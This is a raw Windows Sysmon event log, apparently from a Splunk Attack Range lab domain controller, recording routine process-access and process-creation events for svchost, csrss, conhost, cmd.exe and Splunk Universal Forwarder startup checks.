12:02:55.629{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.629{266CAFBE-64EF-6064-E800-00000000AE01}46086492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.372{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.333{266CAFBE-64EF-6064-E700-00000000AE01}62006388C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.090{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64EF-6064-E500-00000000AE01}64726484C:\Windows\system32\cmd.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.077{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000008243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.068{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
